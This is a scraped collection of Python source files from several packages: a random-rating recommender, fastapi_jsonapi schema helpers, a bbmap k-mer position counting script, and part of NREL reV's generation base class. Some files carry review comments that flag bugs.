                        feedback_value = np.random.uniform(self.train_set['min_value'], self.train_set['max_value'])
                    else:
                        feedback_value = np.random.normal(self.train_set['mean_value'], std)
                    self.predictions.append((user, item, feedback_value))
        else:
            # fixed: the original `raise NotImplemented` is a TypeError in
            # Python 3 because NotImplemented is not an exception class
            raise NotImplementedError

    def compute(self, verbose=True, metrics=None, verbose_evaluation=True, as_table=False, table_sep='\t'):
        r"""
        Extends compute method from BaseRatingPrediction. Method to run recommender algorithm

        :param verbose: Print recommender and database information
        :type verbose: bool, default True

        :param metrics: List of evaluation measures
        :type metrics: list, default None

        :param verbose_evaluation: Print the evaluation results
        :type verbose_evaluation: bool, default True

        :param as_table: Print the evaluation results as table
        :type as_table: bool, default False

        :param table_sep: Delimiter for print results (only work with verbose=True and as_table=True)
        :type table_sep: str, default '\t'
        """
        super(RandomRec, self).compute(verbose=verbose)

        if verbose:
            print("prediction_time:: %4f sec" % timed(self.predict))
            print('\n')
        else:
            self.predict()

        self.write_predictions()

        if self.test_file is not None:
            self.evaluate(metrics, verbose_evaluation, as_table=as_table, table_sep=table_sep)
/fastapi_jsonapi-2.0.0.tar.gz/fastapi_jsonapi-2.0.0/fastapi_jsonapi/schema.py | from typing import (
TYPE_CHECKING,
Dict,
List,
Optional,
Sequence,
Type,
Union,
)
from fastapi import FastAPI
from pydantic import (
BaseConfig,
BaseModel,
Extra,
Field,
)
if TYPE_CHECKING:
from fastapi_jsonapi.data_typing import TypeSchema
class BaseJSONAPIRelationshipSchema(BaseModel):
    """JSON:API relationship resource-identifier object (the ``{id, type}`` pair)."""
    id: str = Field(..., description="Related object ID")
    type: str = Field(..., description="Type of the related resource object")
    class Config(BaseConfig):
        # reject unknown members in relationship identifier objects
        extra = Extra.forbid
class BaseJSONAPIRelationshipDataToOneSchema(BaseModel):
    """To-one relationship wrapper: ``data`` holds a single resource identifier."""
    data: BaseJSONAPIRelationshipSchema
class BaseJSONAPIRelationshipDataToManySchema(BaseModel):
    """To-many relationship wrapper: ``data`` holds a list of resource identifiers."""
    data: List[BaseJSONAPIRelationshipSchema]
class BaseJSONAPIItemSchema(BaseModel):
    """Base JSON:API item schema."""
    type: str = Field(description="Resource type")
    attributes: dict = Field(description="Resource object attributes")
class BaseJSONAPIItemInSchema(BaseJSONAPIItemSchema):
"""
post/patch
TODO POST: optionally accept custom id for object
https://jsonapi.org/format/#crud-creating-client-ids
TODO PATCH: accept object id (maybe create a new separate schema)
"""
attributes: "TypeSchema" = Field(description="Resource object attributes")
relationships: Optional["TypeSchema"] = Field(None, description="Resource object relationships")
id: Optional[str] = Field(description="Resource object ID")
class BaseJSONAPIDataInSchema(BaseModel):
    """Top-level inbound document: ``{"data": <resource object>}``."""
    data: BaseJSONAPIItemInSchema
class BaseJSONAPIObjectSchema(BaseJSONAPIItemSchema):
    """Base JSON:API object schema."""
    id: str = Field(description="Resource object ID")
class JSONAPIResultListMetaSchema(BaseModel):
    """JSON:API list meta schema."""
    count: Optional[int]  # number of items in the result set
    total_pages: Optional[int] = Field(alias="totalPages")  # pagination page count
    class Config:
        # accept both the python field name and the camelCase alias on input
        allow_population_by_field_name = True
class JSONAPIDocumentObjectSchema(BaseModel):
    """
    JSON:API Document Object Schema.
    https://jsonapi.org/format/#document-jsonapi-object
    """
    # NOTE(review): the description text is Russian ("json-api version") while
    # the rest of the field descriptions are English -- consider translating
    version: str = Field(default="1.0", description="json-api версия")
class JSONAPIObjectSchema(BaseJSONAPIObjectSchema):
    """JSON:API base object schema."""
class BaseJSONAPIResultSchema(BaseModel):
    """
    JSON:API Required fields schema
    """
    meta: Optional[JSONAPIResultListMetaSchema] = Field(description="JSON:API metadata")
    # the top-level "jsonapi" version object, defaulting to version 1.0
    jsonapi: JSONAPIDocumentObjectSchema = JSONAPIDocumentObjectSchema()
class JSONAPIResultListSchema(BaseJSONAPIResultSchema):
    """JSON:API list base result schema."""
    data: Sequence[JSONAPIObjectSchema] = Field(description="Resource objects collection")
class JSONAPIResultDetailSchema(BaseJSONAPIResultSchema):
"""JSON:API base detail schema."""
data: JSONAPIObjectSchema = Field(description="Resource object data")
# A relationship is represented either by a single linkage (to-one) or by a
# list of linkages (to-many); this alias covers both wrapper classes.
RelationshipInfoSchema = Union[
    Type[BaseJSONAPIRelationshipDataToOneSchema],
    Type[BaseJSONAPIRelationshipDataToManySchema],
]
def get_model_field(schema: Type["TypeSchema"], field: str) -> str:
    """
    Get the model field of a schema field.

    # todo: use alias (custom names)?
    For example:
        class Computer(sqla_base):
            user = relationship(User)
        class ComputerSchema(pydantic_base):
            owner = Field(alias="user", relationship=...)

    :param schema: a pydantic schema
    :param field: the name of the schema field
    :return: the name of the field in the model
    :raises Exception: if the schema from parameter has no attribute for parameter.
    """
    # guard clause: a present field maps to itself (aliases not supported yet)
    if schema.__fields__.get(field) is not None:
        return field
    msg = "{schema} has no attribute {field}".format(
        schema=schema.__name__,
        field=field,
    )
    raise Exception(msg)
def get_relationships(schema: Type["TypeSchema"], model_field: bool = False) -> List[str]:
    """
    Return the names of the relationship fields of a schema.

    A field counts as a relationship when its declared type is itself a
    pydantic model.

    :param schema: a pydantic schema to inspect
    :param model_field: when True, translate each schema field name to the
        corresponding model field name via :func:`get_model_field`
    :return: list of relationship field names
    """
    found: List[str] = []
    for field_name, field_info in schema.__fields__.items():
        try:
            is_relationship = issubclass(field_info.type_, BaseModel)
        except TypeError:
            # type_ may be a typing construct (e.g. List[int]) that
            # issubclass cannot handle; such fields are not relationships
            continue
        if is_relationship:
            found.append(field_name)
    if model_field is True:
        found = [get_model_field(schema, key) for key in found]
    return found
def get_schema_from_type(resource_type: str, app: FastAPI) -> Type[BaseModel]:
    """
    Retrieve a schema from the registry by his type.

    :param resource_type: the type of the resource.
    :param app: FastAPI app instance.
    :return Schema: the schema class.
    :raises Exception: if the schema not found for this resource type.
    """
    # the registry is attached to the app object; default to an empty mapping
    # so a missing registry raises the explicit error below, not AttributeError
    schemas: Dict[str, Type[BaseModel]] = getattr(app, "schemas", {})
    try:
        return schemas[resource_type]
    except KeyError as exc:
        msg = "Couldn't find schema for type: {type}".format(type=resource_type)
        # chain the original KeyError so tracebacks show the failed lookup
        raise Exception(msg) from exc
def get_related_schema(schema: Type["TypeSchema"], field: str) -> Type["TypeSchema"]:
    """
    Look up the schema class behind a relationship field.

    :params schema: the schema to retrieve le relationship field from
    :params field: the relationship field
    :return: the related schema
    """
    field_info = schema.__fields__[field]
    return field_info.type_
/ARGs_OAP-2.3.2.tar.gz/ARGs_OAP-2.3.2/ARGs_OAP/bin/bbmap/pytools/lib/kmercount_pos.py |
from __future__ import division
import sys
import os
import argparse
import string
from collections import Counter
import random
sys.path.append(os.path.dirname(__file__));
import readSeq
import multiprocessing
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
KMER = 16
SUBLEN = 1000000
def getArgs():
    """Build the argument parser and return the parsed command-line options."""
    parser = argparse.ArgumentParser(
        description="Count occurance of database kmers in reads",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument(
        '-k', default=KMER, dest='kmer', metavar='<int>', type=int,
        help="kmer length")
    parser.add_argument(
        '-l', dest='sublen', metavar='<int>', type=int,
        help="perform analysis on first <int> bases [RDLEN - K + 1]")
    parser.add_argument(
        '-c', default=2, dest='cutoff', metavar='<int>', type=int,
        help="minimum allowed coverage")
    parser.add_argument(
        '-t', default=30, dest='targetCov', metavar='<int>', type=int,
        help="target coverage")
    parser.add_argument(
        '-p', '--plot', dest='plot', type=str, default=None, metavar="<file>",
        help='plot data and save as png to <file>')
    parser.add_argument(
        'fastaFile', type=str, help='Input FASTA file(s). Text or gzip')
    parser.add_argument(
        'fastqFile', nargs='+', help='Input FASTQ file(s). Text or gzip')
    return parser.parse_args()
def getMers(seq, merLen):
    """Yield successive overlapping mers of length ``merLen`` from ``seq``.

    At most SUBLEN mers are produced, capping the work done on very long
    sequences.
    """
    # range (not xrange) keeps this generator Python 2/3 compatible; the
    # rest of the file already opts into py3 semantics via __future__
    for start in range(min(len(seq) - merLen + 1, SUBLEN)):
        yield seq[start:start + merLen]
# Build the DNA complement translation table in a way that works on both
# Python 3 (str.maketrans) and Python 2 (string.maketrans, removed in py3).
try:
    _maketrans = str.maketrans  # Python 3
except AttributeError:
    _maketrans = string.maketrans  # Python 2 fallback
complements = _maketrans('acgtACGT', 'tgcaTGCA')
def revComp(seq):
    """Return the reverse complement of DNA sequence ``seq`` (case preserved)."""
    revCompSeq = seq.translate(complements)[::-1]
    return revCompSeq
def tallyPositions(seq,counts,sublen=None):
    """Increment per-position counters for each kmer of ``seq`` found in merCnts.

    :param seq: read sequence to scan
    :param counts: list of per-read-position hit counters (indexed by position)
    :param sublen: optional cap; stop tallying after this many positions
    """
    readPos = 0
    for mer in getMers(seq, KMER):
        if mer in merCnts:
            # grow the list if the read is longer than the pre-sized counters;
            # fixed off-by-one: the original used '>' which raised IndexError
            # below when readPos == len(counts)
            if readPos >= len(counts):
                counts.append(1)
            else:
                counts[readPos] += 1
        readPos += 1
        if sublen:
            if readPos == sublen:
                break
#end tallyPositions
def main():
    """
    kmer based normization
    call rand once
    004
    if avecov1|2 < mincov:
        trash
    elif avecov1|2 < target:
        keep
    elif random < target/avecov1|2:
        keep
    else:
        trash
    """
    args = getArgs()
    # the kmer length is stored in a module global so tallyPositions sees it
    global KMER
    KMER = args.kmer
    out=sys.stdout
    #check to make sure input files exist
    for fq in args.fastqFile:
        if not os.path.exists(fq):
            sys.stderr.write("ERROR: Input file '%s' does not exist. Exiting.\n" % fq)
            sys.exit()
    #count mers / create database
    sys.stderr.write("Making k-mer database\n")
    global merCnts
    merCnts = Counter()
    for record in readSeq.readSeq(args.fastaFile,fileType='fasta'):
        for mer in getMers(record.seq, args.kmer):
            # NOTE(review): sortMers is computed but never used — the intent
            # may have been to count canonical (sorted) kmers only; confirm.
            sortMers = sorted([mer, revComp(mer)])
            merCnts[mer] += 1
            merCnts[revComp(mer)] += 1
    #normalize reads
    sys.stderr.write("Tallying occurrences of database kmers in reads\n")
    # NOTE(review): 'fq' here is left over from the validation loop above, so
    # this iterator is built from the LAST fastq file only, and it is never
    # re-created inside the per-file loop below — additional fastq inputs are
    # never actually read. Confirm whether multiple fastq files are expected.
    seqIt = readSeq.readSeq(fq,paired=True)
    # .next() is Python 2 only; the first pair is consumed to learn read length
    record1,record2 = seqIt.next()
    readLen = len(record1.seq)
    sys.stderr.write("Read length = %d\n" % readLen)
    # number of positions in a read that can start a full-length kmer
    tallyLen = readLen - args.kmer + 1
    if args.sublen:
        if args.sublen > tallyLen:
            sys.stderr.write("sublen (-l) must be less than readlen - k + 1 : (found reads of length %d\n" % readLen)
            sys.exit(-1)
        tallyLen = args.sublen
    counts1 = [0 for x in range(tallyLen)]
    counts2 = [0 for x in range(tallyLen)]
    # tally the pair that was already consumed above
    tallyPositions(record1.seq,counts1,tallyLen)
    tallyPositions(record2.seq,counts2,tallyLen)
    total_reads = 1
    fqName = ""
    for fq in args.fastqFile:
        for record1, record2 in seqIt:
            tallyPositions(record1.seq,counts1,tallyLen)
            tallyPositions(record2.seq,counts2,tallyLen)
            total_reads += 1
        fqName += fq+" "
    # convert raw hit counts to percentage of reads with a database kmer hit
    counts1_perc = [ 100 * float(x)/total_reads for x in counts1 ]
    counts2_perc = [ 100 * float(x)/total_reads for x in counts2 ]
    out.write("#pos\tread1_count\tread1_perc\tread2_count\tread2_perc\n")
    for i in range(tallyLen):
        out.write("%i\t%i\t%0.2f\t%i\t%0.2f\n" % (i+1,counts1[i],counts1_perc[i],counts2[i],counts2_perc[i]))
    if args.plot:
        sys.stderr.write("Plotting data. Saving to %s\n" % args.plot)
        plt.ioff()
        xcoord = range(1,tallyLen+1)
        plt.plot(xcoord,counts1_perc,color="red",linewidth=1.0,linestyle="-",label="Read 1")
        plt.plot(xcoord,counts2_perc,color="green",linewidth=1.0,linestyle="-",label="Read 2")
        leg_loc="upper right"
        max_cnt = 0
        max_pos = 0
        # find where the tallest peak sits so the legend can dodge it
        for i in range(len(counts1)):
            if counts1[i] > max_cnt or counts2[i] > max_cnt:
                max_cnt = counts1[i] if counts1[i] > counts2[i] else counts2[i]
                max_pos = i
        if max_pos > 0.5*len(counts1) :
            leg_loc="upper left"
        plt.legend(loc=leg_loc,prop={'size':10})
        plt.xlabel("Read Position")
        plt.ylabel("Percent Reads with Database k-mer")
        plt.title("Occurrence of reference k-mers (k = %i) in \n%s (# reads = %d)" % (args.kmer,fqName,total_reads))
        plt.savefig(args.plot)
if __name__ == '__main__':
    try:
        main()
    # exit quietly on Ctrl-C instead of dumping a traceback
    except KeyboardInterrupt:
        pass
/NREL_reV-0.8.1-py3-none-any.whl/reV/generation/base.py | from abc import ABC, abstractmethod
import copy
from concurrent.futures import TimeoutError
import logging
import pandas as pd
import numpy as np
import os
import psutil
import json
import sys
from warnings import warn
from reV.config.output_request import SAMOutputRequest
from reV.config.project_points import ProjectPoints, PointsControl
from reV.handlers.outputs import Outputs
from reV.SAM.version_checker import PySamVersionChecker
from reV.utilities.exceptions import (OutputWarning, ExecutionError,
ParallelExecutionWarning,
OffshoreWindInputWarning)
from reV.utilities import log_versions, ModuleName
from rex.resource import Resource
from rex.utilities.execution import SpawnProcessPool
logger = logging.getLogger(__name__)
# Directory holding the JSON files that describe reV output attributes
# (units, dtypes, scale factors), shipped alongside this module.
ATTR_DIR = os.path.dirname(os.path.realpath(__file__))
ATTR_DIR = os.path.join(ATTR_DIR, 'output_attributes')
# Load each attribute group once at import time; these feed the class-level
# OUT_ATTRS / ECON_ATTRS mappings below.
with open(os.path.join(ATTR_DIR, 'other.json'), 'r') as f:
    OTHER_ATTRS = json.load(f)
with open(os.path.join(ATTR_DIR, 'lcoe_fcr.json'), 'r') as f:
    LCOE_ATTRS = json.load(f)
with open(os.path.join(ATTR_DIR, 'single_owner.json'), 'r') as f:
    SO_ATTRS = json.load(f)
with open(os.path.join(ATTR_DIR, 'windbos.json'), 'r') as f:
    BOS_ATTRS = json.load(f)
with open(os.path.join(ATTR_DIR, 'lcoe_fcr_inputs.json'), 'r') as f:
    LCOE_IN_ATTRS = json.load(f)
class BaseGen(ABC):
    """Base class for reV gen and econ classes to run SAM simulations."""

    # Mapping of reV requests to SAM objects that should be used for simulation
    OPTIONS = {}

    # Mapping of reV generation / econ outputs to scale factors and units.
    OUT_ATTRS = copy.deepcopy(OTHER_ATTRS)

    # Mapping of reV econ outputs to scale factors and units.
    # Type is scalar or array and corresponds to the SAM single-site output
    # This is the OUT_ATTRS class attr for Econ but should also be accessible
    # to rev generation
    ECON_ATTRS = copy.deepcopy(OTHER_ATTRS)
    ECON_ATTRS.update(LCOE_ATTRS)
    ECON_ATTRS.update(SO_ATTRS)
    ECON_ATTRS.update(BOS_ATTRS)
    ECON_ATTRS.update(LCOE_IN_ATTRS)

    # SAM argument names used to calculate LCOE
    # Note that system_capacity is not included here because it is never used
    # downstream and could be confused with the supply_curve point capacity
    LCOE_ARGS = ('fixed_charge_rate', 'capital_cost', 'fixed_operating_cost',
                 'variable_operating_cost')

    def __init__(self, points_control, output_request, site_data=None,
                 drop_leap=False, memory_utilization_limit=0.4,
                 scale_outputs=True):
        """
        Parameters
        ----------
        points_control : reV.config.project_points.PointsControl
            Project points control instance for site and SAM config spec.
        output_request : list | tuple
            Output variables requested from SAM.
        site_data : str | pd.DataFrame | None
            Site-specific input data for SAM calculation. String should be a
            filepath that points to a csv, DataFrame is pre-extracted data.
            Rows match sites, columns are input keys. Need a "gid" column.
            Input as None if no site-specific data.
        drop_leap : bool
            Drop leap day instead of final day of year during leap years.
        memory_utilization_limit : float
            Memory utilization limit (fractional). This sets how many site
            results will be stored in-memory at any given time before flushing
            to disk.
        scale_outputs : bool
            Flag to scale outputs in-place immediately upon Gen returning data.
        """
        log_versions(logger)
        self._points_control = points_control
        # lazily-computed caches; populated on first property access
        self._year = None
        self._site_limit = None
        self._site_mem = None
        self._out_fpath = None
        self._meta = None
        self._time_index = None
        self._sam_module = None
        self._sam_obj_default = None
        self._drop_leap = drop_leap
        self.mem_util_lim = memory_utilization_limit
        self.scale_outputs = scale_outputs

        # snapshot of runtime arguments, later written to the output h5
        self._run_attrs = {'points_control': str(points_control),
                           'output_request': output_request,
                           'site_data': str(site_data),
                           'drop_leap': str(drop_leap),
                           'memory_utilization_limit': self.mem_util_lim}

        # site data must be parsed and joined to project points before the
        # output request is parsed (subclasses may inspect SAM inputs)
        self._site_data = self._parse_site_data(site_data)
        self.add_site_data_to_pp(self._site_data)
        output_request = SAMOutputRequest(output_request)
        self._output_request = self._parse_output_request(output_request)

        # pre-initialize output arrays to store results when available.
        self._out = {}
        self._finished_sites = []
        self._out_n_sites = 0
        self._out_chunk = ()
        self._check_sam_version_inputs()
    @property
    def output_request(self):
        """Get the output variables requested from the user.

        Returns
        -------
        output_request : list
            Output variables requested from SAM.
        """
        return self._output_request

    @property
    def out_chunk(self):
        """Get the current output chunk index range (INCLUSIVE).

        Returns
        -------
        _out_chunk : tuple
            Two entry tuple (start, end) indicies (inclusive) for where the
            current data in-memory belongs in the final output.
        """
        return self._out_chunk

    @property
    def site_data(self):
        """Get the site-specific inputs in dataframe format.

        Returns
        -------
        _site_data : pd.DataFrame
            Site-specific input data for gen or econ calculation. Rows match
            sites, columns are variables.
        """
        return self._site_data

    @property
    def site_limit(self):
        """Get the number of sites results that can be stored in memory at once

        Returns
        -------
        _site_limit : int
            Number of site result sets that can be stored in memory at once
            without violating memory limits.
        """
        if self._site_limit is None:
            # lazily computed: total system memory scaled by the configured
            # utilization fraction, divided by the per-site memory footprint
            tot_mem = psutil.virtual_memory().total / 1e6
            avail_mem = self.mem_util_lim * tot_mem
            self._site_limit = int(np.floor(avail_mem / self.site_mem))
            logger.info('Limited to storing {0} sites in memory '
                        '({1:.1f} GB total hardware, {2:.1f} GB available '
                        'with {3:.1f}% utilization).'
                        .format(self._site_limit, tot_mem / 1e3,
                                avail_mem / 1e3, self.mem_util_lim * 100))
        return self._site_limit

    @property
    def site_mem(self):
        """Get the memory (MB) required to store all results for a single site.

        Returns
        -------
        _site_mem : float
            Memory (MB) required to store all results in requested in
            output_request for a single site.
        """
        if self._site_mem is None:
            # average the memory usage over n sites
            # (for better understanding of array overhead)
            n = 100
            self._site_mem = 0
            for request in self.output_request:
                dtype = 'float32'
                if request in self.OUT_ATTRS:
                    dtype = self.OUT_ATTRS[request].get('dtype', 'float32')
                shape = self._get_data_shape(request, n)
                self._site_mem += sys.getsizeof(np.ones(shape, dtype=dtype))
            # bytes for n sites -> MB per single site
            self._site_mem = self._site_mem / 1e6 / n
            logger.info('Output results from a single site are calculated to '
                        'use {0:.1f} KB of memory.'
                        .format(self._site_mem / 1000))
        return self._site_mem

    @property
    def points_control(self):
        """Get project points controller.

        Returns
        -------
        points_control : reV.config.project_points.PointsControl
            Project points control instance for site and SAM config spec.
        """
        return self._points_control

    @property
    def project_points(self):
        """Get project points

        Returns
        -------
        project_points : reV.config.project_points.ProjectPoints
            Project points from the points control instance.
        """
        return self._points_control.project_points

    @property
    def sam_configs(self):
        """Get the sam config dictionary.

        Returns
        -------
        sam_configs : dict
            SAM config from the project points instance.
        """
        return self.project_points.sam_inputs
@property
def sam_metas(self):
"""
SAM configurations including runtime module
Returns
-------
sam_metas : dict
Nested dictionary of SAM configuration files with module used
at runtime
"""
sam_metas = self.sam_configs.copy()
for v in sam_metas.values():
v.update({'module': self._sam_module.MODULE})
return sam_metas
    @property
    def sam_module(self):
        """Get the SAM module class to be used for SAM simulations.

        Returns
        -------
        sam_module : object
            SAM object like PySAM.Pvwattsv7 or PySAM.Lcoefcr
        """
        return self._sam_module

    @property
    def meta(self):
        """Get resource meta for all sites in project points.

        Returns
        -------
        meta : pd.DataFrame
            Meta data df for sites in project points. Column names are meta
            data variables, rows are different sites. The row index
            does not indicate the site number if the project points are
            non-sequential or do not start from 0, so a 'gid' column is added.
        """
        return self._meta

    @property
    def time_index(self):
        """Get the resource time index data.

        Returns
        -------
        _time_index : pandas.DatetimeIndex
            Time-series datetime index
        """
        return self._time_index

    @property
    def run_attrs(self):
        """
        Run time attributes (__init__ args and kwargs)

        Returns
        -------
        run_attrs : dict
            Dictionary of runtime args and kwargs
        """
        return self._run_attrs

    @property
    def year(self):
        """Get the resource year.

        Returns
        -------
        _year : int
            Year of the time-series datetime index.
        """
        if self._year is None and self.time_index is not None:
            # lazily extract the year from the first timestep
            self._year = int(self.time_index.year[0])
        return self._year

    @property
    def tech(self):
        """Get the reV technology string.

        Returns
        -------
        tech : str
            SAM technology to analyze (pvwattsv7, windpower, tcsmoltensalt,
            solarwaterheat, troughphysicalheat, lineardirectsteam, econ)
            The string should be lower-cased with spaces and _ removed.
        """
        return self.project_points.tech
@property
def out(self):
"""Get the reV gen or econ output results.
Returns
-------
out : dict
Dictionary of gen or econ results from SAM.
"""
out = {}
for k, v in self._out.items():
if k in self.OUT_ATTRS:
scale_factor = self.OUT_ATTRS[k].get('scale_factor', 1)
else:
scale_factor = 1
if scale_factor != 1 and self.scale_outputs:
v = v.astype('float32')
v /= scale_factor
out[k] = v
return out
    @out.setter
    def out(self, result):
        """Set the output attribute, unpack futures, clear output from mem.

        Parameters
        ----------
        result : list | dict | None
            Gen or Econ results to set to output dictionary. Use cases:
             - List input is interpreted as a futures list, which is unpacked
               before setting to the output dict.
             - Dictionary input is interpreted as an already unpacked result.
             - None is interpreted as a signal to clear the output dictionary.
        """
        if isinstance(result, list):
            # unpack futures list to dictionary first
            result = self.unpack_futures(result)

        if isinstance(result, dict):

            # iterate through dict where sites are keys and values are
            # corresponding results
            for site_gid, site_output in result.items():

                # check that the sites are stored sequentially then add to
                # the finished site list (gids must arrive in ascending order
                # so the in-memory chunk maps onto a contiguous output slice)
                if self._finished_sites:
                    if int(site_gid) < np.max(self._finished_sites):
                        raise Exception('Site results are non sequential!')

                # unpack site output object
                self.unpack_output(site_gid, site_output)

                # add site gid to the finished list after outputs are unpacked
                self._finished_sites.append(site_gid)

        elif isinstance(result, type(None)):
            self._out.clear()
            self._finished_sites.clear()
        else:
            raise TypeError('Did not recognize the type of output. '
                            'Tried to set output type "{}", but requires '
                            'list, dict or None.'.format(type(result)))
@staticmethod
def _output_request_type_check(req):
"""Output request type check and ensure list for manipulation.
Parameters
----------
req : list | tuple | str
Output request of variable type.
Returns
-------
output_request : list
Output request.
"""
if isinstance(req, list):
output_request = req
elif isinstance(req, tuple):
output_request = list(req)
elif isinstance(req, str):
output_request = [req]
else:
raise TypeError('Output request must be str, list, or tuple but '
'received: {}'.format(type(req)))
return output_request
@staticmethod
def handle_leap_ti(ti, drop_leap=False):
"""Handle a time index for a leap year by dropping a day.
Parameters
----------
ti : pandas.DatetimeIndex
Time-series datetime index with or without a leap day.
drop_leap : bool
Option to drop leap day (if True) or drop the last day of the year
(if False).
Returns
-------
ti : pandas.DatetimeIndex
Time-series datetime index with length a multiple of 365.
"""
# drop leap day or last day
leap_day = ((ti.month == 2) & (ti.day == 29))
last_day = ((ti.month == 12) & (ti.day == 31))
if drop_leap:
# preference is to drop leap day if exists
ti = ti.drop(ti[leap_day])
elif any(leap_day):
# leap day exists but preference is to drop last day of year
ti = ti.drop(ti[last_day])
if len(ti) % 365 != 0:
raise ValueError('Bad time index with length not a multiple of '
'365: {}'.format(ti))
return ti
    @staticmethod
    def _pp_to_pc(points, points_range, sam_configs, tech,
                  sites_per_worker=None, res_file=None, curtailment=None):
        """
        Create ProjectControl from ProjectPoints

        Parameters
        ----------
        points : int | slice | list | str | pandas.DataFrame
                 | reV.config.project_points.PointsControl
            Single site integer,
            or slice or list specifying project points,
            or string pointing to a project points csv,
            or a pre-loaded project points DataFrame,
            or a fully instantiated PointsControl object.
        points_range : list | None
            Optional two-entry list specifying the index range of the sites to
            analyze. To be taken from the reV.config.PointsControl.split_range
            property.
        sam_configs : dict | str | SAMConfig
            SAM input configuration ID(s) and file path(s). Keys are the SAM
            config ID(s) which map to the config column in the project points
            CSV. Values are either a JSON SAM config file or dictionary of SAM
            config inputs. Can also be a single config file path or a
            pre loaded SAMConfig object.
        tech : str
            SAM technology to analyze (pvwattsv7, windpower, tcsmoltensalt,
            solarwaterheat, troughphysicalheat, lineardirectsteam)
            The string should be lower-cased with spaces and _ removed.
        sites_per_worker : int
            Number of sites to run in series on a worker. None defaults to the
            resource file chunk size.
        res_file : str
            Filepath to single resource file, multi-h5 directory,
            or /h5_dir/prefix*suffix
        curtailment : NoneType | dict | str | config.curtailment.Curtailment
            Inputs for curtailment parameters. If not None, curtailment inputs
            are expected. Can be:
                - Explicit namespace of curtailment variables (dict)
                - Pointer to curtailment config json file with path (str)
                - Instance of curtailment config object
                  (config.curtailment.Curtailment)

        Returns
        -------
        pc : reV.config.project_points.PointsControl
            PointsControl object instance.
        """
        # duck-typed check: a pre-built project points object carries its
        # points dataframe on a .df attribute
        if hasattr(points, "df"):
            points = points.df

        pp = ProjectPoints(points, sam_configs, tech=tech, res_file=res_file,
                           curtailment=curtailment)

        # make Points Control instance
        if points_range is not None:
            # PointsControl is for just a subset of the project points...
            # this is the case if generation is being initialized on one
            # of many HPC nodes in a large project
            pc = PointsControl.split(points_range[0], points_range[1], pp,
                                     sites_per_split=sites_per_worker)
        else:
            # PointsControl is for all of the project points
            pc = PointsControl(pp, sites_per_split=sites_per_worker)

        return pc

    @classmethod
    def get_pc(cls, points, points_range, sam_configs, tech,
               sites_per_worker=None, res_file=None, curtailment=None):
        """Get a PointsControl instance.

        Parameters
        ----------
        points : int | slice | list | str | pandas.DataFrame | PointsControl
            Single site integer,
            or slice or list specifying project points,
            or string pointing to a project points csv,
            or a pre-loaded project points DataFrame,
            or a fully instantiated PointsControl object.
        points_range : list | None
            Optional two-entry list specifying the index range of the sites to
            analyze. To be taken from the reV.config.PointsControl.split_range
            property.
        sam_configs : dict | str | SAMConfig
            SAM input configuration ID(s) and file path(s). Keys are the SAM
            config ID(s) which map to the config column in the project points
            CSV. Values are either a JSON SAM config file or dictionary of SAM
            config inputs. Can also be a single config file path or a
            pre loaded SAMConfig object.
        tech : str
            SAM technology to analyze (pvwattsv7, windpower, tcsmoltensalt,
            solarwaterheat, troughphysicalheat, lineardirectsteam)
            The string should be lower-cased with spaces and _ removed.
        sites_per_worker : int
            Number of sites to run in series on a worker. None defaults to the
            resource file chunk size.
        res_file : str
            Filepath to single resource file, multi-h5 directory,
            or /h5_dir/prefix*suffix
        curtailment : NoneType | dict | str | config.curtailment.Curtailment
            Inputs for curtailment parameters. If not None, curtailment inputs
            are expected. Can be:
                - Explicit namespace of curtailment variables (dict)
                - Pointer to curtailment config json file with path (str)
                - Instance of curtailment config object
                  (config.curtailment.Curtailment)

        Returns
        -------
        pc : reV.config.project_points.PointsControl
            PointsControl object instance.
        """
        # 'econ' is always a valid tech even though it has no OPTIONS entry
        if tech not in cls.OPTIONS and tech.lower() != ModuleName.ECON:
            msg = ('Did not recognize reV-SAM technology string "{}". '
                   'Technology string options are: {}'
                   .format(tech, list(cls.OPTIONS.keys())))
            logger.error(msg)
            raise KeyError(msg)

        if sites_per_worker is None:
            # get the optimal sites per split based on res file chunk size
            sites_per_worker = cls.get_sites_per_worker(res_file)
            logger.debug('Sites per worker being set to {} for '
                         'PointsControl.'.format(sites_per_worker))

        if isinstance(points, PointsControl):
            # received a pre-intialized instance of pointscontrol
            pc = points
        else:
            pc = cls._pp_to_pc(points, points_range, sam_configs, tech,
                               sites_per_worker=sites_per_worker,
                               res_file=res_file, curtailment=curtailment)

        return pc
@staticmethod
def get_sites_per_worker(res_file, default=100):
"""Get the nominal sites per worker (x-chunk size) for a given file.
This is based on the concept that it is most efficient for one core to
perform one read on one chunk of resource data, such that chunks will
not have to be read into memory twice and no sites will be read
redundantly.
Parameters
----------
res_file : str
Filepath to single resource file, multi-h5 directory,
or /h5_dir/prefix*suffix
default : int
Sites to be analyzed on a single core if the chunk size cannot be
determined from res_file.
Returns
-------
sites_per_worker : int
Nominal sites to be analyzed per worker. This is set to the x-axis
chunk size for windspeed and dni datasets for the WTK and NSRDB
data, respectively.
"""
if not res_file or not os.path.isfile(res_file):
return default
with Resource(res_file) as res:
if 'wtk' in res_file.lower():
for dset in res.datasets:
if 'speed' in dset:
# take nominal WTK chunks from windspeed
_, _, chunks = res.get_dset_properties(dset)
break
elif 'nsrdb' in res_file.lower():
# take nominal NSRDB chunks from dni
_, _, chunks = res.get_dset_properties('dni')
else:
warn('Could not infer dataset chunk size as the resource type '
'could not be determined from the filename: {}'
.format(res_file))
chunks = None
if chunks is None:
# if chunks not set, go to default
sites_per_worker = default
logger.debug('Sites per worker being set to {} (default) based on '
'no set chunk size in {}.'
.format(sites_per_worker, res_file))
else:
sites_per_worker = chunks[1]
logger.debug('Sites per worker being set to {} based on chunk '
'size of {}.'.format(sites_per_worker, res_file))
return sites_per_worker
@staticmethod
def unpack_futures(futures):
"""Combine list of futures results into their native dict format/type.
Parameters
----------
futures : list
List of dictionary futures results.
Returns
-------
out : dict
Compiled results of the native future results type (dict).
"""
out = {}
for x in futures:
out.update(x)
return out
    @staticmethod
    @abstractmethod
    def _run_single_worker(points_control, tech=None, res_file=None,
                           output_request=None, scale_outputs=True):
        """Run a reV-SAM analysis based on the points_control iterator.

        Abstract: concrete Gen/Econ subclasses supply the implementation.

        Parameters
        ----------
        points_control : reV.config.PointsControl
            A PointsControl instance dictating what sites and configs are run.
        tech : str
            SAM technology to analyze (pvwattsv7, windpower, tcsmoltensalt,
            solarwaterheat, troughphysicalheat, lineardirectsteam)
            The string should be lower-cased with spaces and _ removed.
        res_file : str
            Filepath to single resource file, multi-h5 directory,
            or /h5_dir/prefix*suffix
        output_request : list | tuple
